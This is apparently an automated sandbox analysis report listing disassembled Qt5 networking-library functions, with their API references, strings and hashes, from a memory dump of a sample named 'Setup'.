                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@$Variant@@$Meta$ConnectionType@$Array@@ByteConnection@Data@@$?invokeArgument@@333333333@ListMethod@Qt@@Qt@@@Url@@V0@@$?connect@Logger@@Message$?begin@?compare@?debug@?dispose@?end@?free_helper@?from?setCaseData@1@@DateEncoded@HashInt@Mode@1@@Mutex@@Node@1@@Parent@ParsingSensitivity@Time@@V0@$$V1@@
                                                                                                                                                              • String ID: 1_q_cacheLoadReadyRead()$2readChannelFinished()$2readyRead()$QNetworkReplyImpl: setCachingEnabled(true) called after setCachingEnabled(false)$QUrl$_q_cacheLoadReadyRead$_q_metaDataChanged$int$location$onRedirected
                                                                                                                                                              • API String ID: 1924231958-794269202
                                                                                                                                                              • Opcode ID: 431b464ba633db0f57d07d505bb71e5538782703efa7932535a88366e123e37e
                                                                                                                                                              • Instruction ID: 8983d8544729abecea1892f8f476a0715563ae710a0c57c0d988a049ca4d4b00
                                                                                                                                                              • Opcode Fuzzy Hash: 431b464ba633db0f57d07d505bb71e5538782703efa7932535a88366e123e37e
                                                                                                                                                              • Instruction Fuzzy Hash: 54627166A09EC5D5E7628F38D8542ED73A1FF88759F849132DE4D07A25EF38D24ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Variant@@$Bool@ByteV0@@$Array@@Device@@Object@@Url@@$?append@?invoke?open@?read?sharedAll@Argument@@333333333@ArrayArray@@@Buffer@@ConnectionData@@DateDevice@@@@@Flag@Flags@MetaMethod@ModeNull@OpenQt@@RingTime@@Type@V0@$$Valid@
                                                                                                                                                              • String ID: _q_bufferOutgoingData$_q_startOperation
                                                                                                                                                              • API String ID: 2520889489-4139675878
                                                                                                                                                              • Opcode ID: 8ad9f2b170f32126a30a09fff465ea484b0c46023f0984d5e5ad48b2de51eec9
                                                                                                                                                              • Instruction ID: 5ff2d96daa939573dd6c0fa4f9ef7106f07bb0422250ac82a6c676b7c3ad2031
                                                                                                                                                              • Opcode Fuzzy Hash: 8ad9f2b170f32126a30a09fff465ea484b0c46023f0984d5e5ad48b2de51eec9
                                                                                                                                                              • Instruction Fuzzy Hash: E0821C22909EC499E7328F38D8557ED7361FF9871CF859222DA4D1AA25FF34A2D5CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@$List$?from?utf16@Array@Char$?dispose@?load@AddressData@1@@E__@@FreeGlobalLibrary@@ProcSystem$?begin@Char@@Empty@V0@@$?indexArray@@ByteCaseChar@@@DateLatin1Qt@@@Sensitivity@Time@@V0@$$$?append@?clear@?data@?detach_grow@?end@?mid@ArrayData@1@MultipleObjectsWait
                                                                                                                                                              • String ID: Qt System Proxy access/1.0$WinHttpCloseHandle$WinHttpGetDefaultProxyConfiguration$WinHttpGetIEProxyConfigForCurrentUser$WinHttpGetProxyForUrl$WinHttpOpen$winhttp
                                                                                                                                                              • API String ID: 511862194-1767786424
                                                                                                                                                              • Opcode ID: ebdbb8919e9fc1ac213378fd7ae04e6907451f6531d9ac406b5a1f6b830e0f0e
                                                                                                                                                              • Instruction ID: bab94c007de61a6edf9be2fae7f4a67595d67f66014fba077fcf00773630e780
                                                                                                                                                              • Opcode Fuzzy Hash: ebdbb8919e9fc1ac213378fd7ae04e6907451f6531d9ac406b5a1f6b830e0f0e
                                                                                                                                                              • Instruction Fuzzy Hash: 01327CB1A1AB4296EB928B31E8541B977A5FF80794F444037DE6F476A4EF3CE449CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$String@@$?dispose@AdaptersAddressesData@1@@memmove$?append@?detach_grow@?end@BasicData@1@Timer@@freemalloc
                                                                                                                                                              • String ID: Got unknown socket family %d
                                                                                                                                                              • API String ID: 3210312320-2487179491
                                                                                                                                                              • Opcode ID: 0f96530f8caab14e688ee5168579e881a6f31b8b6bc55deb87fbe11b8ceba3ae
                                                                                                                                                              • Instruction ID: 3bba174b68ef47ca8f950361b5ba3db9638c407bb95ad7ac639d99d69c7b0d95
                                                                                                                                                              • Opcode Fuzzy Hash: 0f96530f8caab14e688ee5168579e881a6f31b8b6bc55deb87fbe11b8ceba3ae
                                                                                                                                                              • Instruction Fuzzy Hash: F1328272B0AA4292EB91CF75E4402B973A1FB84BA8F444136DE5E47694EF3CD54ACF40
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Variant@@$Object@@$Connection@Logger@@MessageMeta$Debug@@$?connect@?translate@Application@@ConnectionCoreLatin1Qt@@@Type@$?warning@ByteChar@@@ElapsedString@@@Timer@@V0@@$??6@?arg@?debug@?invalidate@?scheme@?start@ArrayArray@@Bool@Char@@DataLongLong@Null@Ptr@@@Url@@Url@@@V0@$$
                                                                                                                                                              • String ID: 1_q_networkSessionFailed()$1_q_networkSessionStateChanged(QNetworkSession::State)$1_q_networkSessionUsagePoliciesChanged(QNetworkSession::UsagePolicies)$2error(QNetworkSession::SessionError)$2stateChanged(QNetworkSession::State)$2usagePoliciesChanged(QNetworkSession::UsagePolicies)$Backend is waiting for QNetworkSession to connect, but there is none!$Background request not allowed.$Network session error.$Protocol "%1" is unknown$QNetworkReply$QNetworkReplyImpl::_q_startOperation was called more than once
                                                                                                                                                              • API String ID: 54228858-3248017120
                                                                                                                                                              • Opcode ID: f0d9990323e39086b0c764559e7480ddb4eca554b636e79a749ce1e57ce4d255
                                                                                                                                                              • Instruction ID: e4a672852523fec6aabbad5a2ae8de6aff7227480162f48b651303425ad85076
                                                                                                                                                              • Opcode Fuzzy Hash: f0d9990323e39086b0c764559e7480ddb4eca554b636e79a749ce1e57ce4d255
                                                                                                                                                              • Instruction Fuzzy Hash: 10D165B1A0A64286EB92DF75E8506ED7361FB84798F444032DE5E47668EF3CE54ACF00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@$Meta$Variant@@$ConnectionConnection@Type@$?connect@?invokeArgument@@333333333@Method@Qt@@Qt@@@String@@$?translate@Application@@Bool@CoreV0@@
                                                                                                                                                              • String ID: 1_q_networkSessionStateChanged(QNetworkSession::State)$1_q_networkSessionUsagePoliciesChanged(QNetworkSession::UsagePolicies)$2stateChanged(QNetworkSession::State)$2usagePoliciesChanged(QNetworkSession::UsagePolicies)$Background request not allowed.$QNetworkReply$QNetworkReply::NetworkError$QString$_q_error$_q_finished
                                                                                                                                                              • API String ID: 793192670-364496617
                                                                                                                                                              • Opcode ID: 826e871643abf02c0fcbbbded3b009ccc70e44ef30d889f7db7d99842b1b6121
                                                                                                                                                              • Instruction ID: 77b6d59d731730f15422f9fa918eb7ad1894c58413fa74bf6992b31b003477fb
                                                                                                                                                              • Opcode Fuzzy Hash: 826e871643abf02c0fcbbbded3b009ccc70e44ef30d889f7db7d99842b1b6121
                                                                                                                                                              • Instruction Fuzzy Hash: E3129462A09AC595F7629F38D8453ED73A0FF8875CF845132DE8D06A65EF39D24ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@$String@@$MetaVariant@@$ConnectionType@$?invokeArgument@@333333333@ByteConnection@Latin1Logger@@MessageMethod@Qt@@String@@@$?connect@?translate@?warning@Application@@ArrayArray@@CoreDataPtr@@@Qt@@@V0@@
                                                                                                                                                              • String ID: 1_q_networkSessionFailed()$2error(QNetworkSession::SessionError)$Backend is waiting for QNetworkSession to connect, but there is none!$Network session error.$QNetworkReply$QNetworkReply::NetworkError$QString$_q_error$_q_finished
                                                                                                                                                              • API String ID: 2838713502-3126378000
                                                                                                                                                              • Opcode ID: 78c0f055df2067a1ea6c638ae087f82dd1f2b18c3405e702b48012d8c29b3fc8
                                                                                                                                                              • Instruction ID: 8efd0a209acdb01b9604822e1b643b16c18f12ec712aca7dcec6324dd15fb2c5
                                                                                                                                                              • Opcode Fuzzy Hash: 78c0f055df2067a1ea6c638ae087f82dd1f2b18c3405e702b48012d8c29b3fc8
                                                                                                                                                              • Instruction Fuzzy Hash: 00E19562A09ED5D5F7129F38D8452E973B1FF98318F845222DE8D06624EF38D24ACB00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197AD60: ?checkQObjectShared@ExternalRefCountData@QtSharedPointer@@QEAAXPEBVQObject@@@Z.QT5CORE(?,?,?,00007FFBA1974D60,?,?,?,?,?,00007FFBA1974CC0), ref: 00007FFBA197ADBE
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1976F8D
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1976FA3
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1976FBD
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1976FD7
                                                                                                                                                              • ?activate@QMetaObject@@SAXPEAVQObject@@PEBU1@HPEAPEAX@Z.QT5CORE ref: 00007FFBA19770EE
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA197711B
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA1977125
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA1977150
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197715A
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA1977185
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197718F
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19771BA
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19771C4
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA197723D
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1977253
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1977269
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA197727F
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1977295
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19772AB
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19772C1
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19772D7
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19772EC
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1977305
                                                                                                                                                              • ?invokeMethod@QMetaObject@@SA_NPEAVQObject@@PEBDW4ConnectionType@Qt@@VQGenericArgument@@333333333@Z.QT5CORE ref: 00007FFBA19773AA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Generic$Argument@@MetaReturn$Connection@$ConnectionType@$?connect@?disconnect@D01@Qt@@@$?activate@?check?invokeArgument@@333333333@CountData@ExternalMethod@ObjectObject@@@Pointer@@Qt@@SharedShared@
                                                                                                                                                              • String ID: 1_q_networkSessionClosed()$1_q_networkSessionFailed(QNetworkSession::SessionError)$1_q_networkSessionStateChanged(QNetworkSession::State)$2closed()$2error(QNetworkSession::SessionError)$2networkSessionConnected()$2opened()$2stateChanged(QNetworkSession::State)$QNetworkSession::State$_q_networkSessionStateChanged
                                                                                                                                                              • API String ID: 233722527-1168794301
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197E320: ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA198C30C
                                                                                                                                                                • Part of subcall function 00007FFBA197E320: ?className@QMetaObject@@QEBAPEBDXZ.QT5CORE ref: 00007FFBA198C324
                                                                                                                                                                • Part of subcall function 00007FFBA197E320: ?debug@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA198C337
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FFBA197FD66
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@Message$?class?debug@MetaName@Object@@Url@@
                                                                                                                                                              • String ID: cache-control$must-revalidate$no-cache
                                                                                                                                                              • API String ID: 622338911-1948583773
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once., xrefs: 00007FFBA19D28A7
                                                                                                                                                              • Temporary network failure., xrefs: 00007FFBA19D286E
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$V0@@$Null@$?cmp@Device@@Logger@@LongLong@MessageString@@V1@@$?read?set?stop@?tr@?warning@ChannelErrorFinished@MetaObject@@String@String@@@Timer@@V0@$$
                                                                                                                                                              • String ID: QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.$Temporary network failure.
                                                                                                                                                              • API String ID: 2143859080-3817206060
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once., xrefs: 00007FFBA198B0E6
                                                                                                                                                              • Temporary network failure., xrefs: 00007FFBA198B0AD
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$V0@@$Null@$?cmp@Device@@Logger@@LongLong@MessageString@@V1@@$?read?set?tr@?warning@ChannelErrorFinished@MetaObject@@String@String@@@V0@$$
                                                                                                                                                              • String ID: QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.$Temporary network failure.
                                                                                                                                                              • API String ID: 220436485-3817206060
                                                                                                                                                              APIs
                                                                                                                                                              • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FFBA19E652E,?,00000000,00000000,00007FFBA19E6A82,?,?,?,?,00007FFBA19E68A4), ref: 00007FFBA198941B
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA1989480
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA1989530
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA198953B
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA198956B
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA1989576
                                                                                                                                                              • ?reserve@QRingBuffer@@QEAAPEAD_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA19895B4
                                                                                                                                                              • ?read@QIODevice@@QEAA_JPEAD_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA19895C7
                                                                                                                                                              • ?chop@QRingBuffer@@QEAAX_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA19895E5
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ?chop@QRingBuffer@@QEAAX_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FFBA1989601
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1989666
                                                                                                                                                              • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FFBA1989684
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1989693
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19896AA
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19896C0
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19896D6
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19896EC
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1989702
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1989718
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA1989731
                                                                                                                                                              • ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA198974A
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Argument@@GenericReturn$Object@@$Connection@Meta$Buffer@@Ring$?chop@?connect@?disconnect@ConnectionD01@Qt@@@Type@$?read@?reserve@?sharedArrayData@@Device@@Null@Xlength_error@std@@malloc
                                                                                                                                                              • String ID: 1_q_bufferOutgoingData()$1_q_bufferOutgoingDataFinished()$2readChannelFinished()$2readyRead()$_q_startOperation$vector<T> too long
                                                                                                                                                              • API String ID: 141468012-2728861451
                                                                                                                                                              • Opcode ID: 675848130f4aab9260527e1ea579a95f5f59b107125896fb7ec4ba411dda588f
                                                                                                                                                              • Instruction ID: b9c0c85644b19e3fa8278184b0388700dc409c84ab9a1f1a7d9f86717aa39525
                                                                                                                                                              • Opcode Fuzzy Hash: 675848130f4aab9260527e1ea579a95f5f59b107125896fb7ec4ba411dda588f
                                                                                                                                                              • Instruction Fuzzy Hash: 9FC16C62A09F95C6E7528F39E8042ED73B1FF98758F449232DE5D16A25EF38E185CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Generic$Argument@@Return$?end@Data@@ListObject@@$?invoke?qstrcmp@@?startsArgument@@333333333@ConnectionMetaMethod@Qt@@Type@V0@@With@
                                                                                                                                                              • String ID: Accept-Ranges$Range$_q_startOperation$bytes=$none
                                                                                                                                                              • API String ID: 3994552064-680470801
                                                                                                                                                              • Opcode ID: 6e59e0eef43c0f4a1f7bb90b31307f284d9609d2ff4e968d8c81966271c4872c
                                                                                                                                                              • Instruction ID: 12ca2198aa0a934cadb9df614a7162f98180e0233d7b327de7175eada481c581
                                                                                                                                                              • Opcode Fuzzy Hash: 6e59e0eef43c0f4a1f7bb90b31307f284d9609d2ff4e968d8c81966271c4872c
                                                                                                                                                              • Instruction Fuzzy Hash: 67B16F62A09A9599F7628F38D8447EC7371FF5831CF809232DE5D16565FF38A29ACB00
                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF200
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF218
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF241
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF252
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF262
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF280
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF28E
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF29C
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF2EB
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF2FC
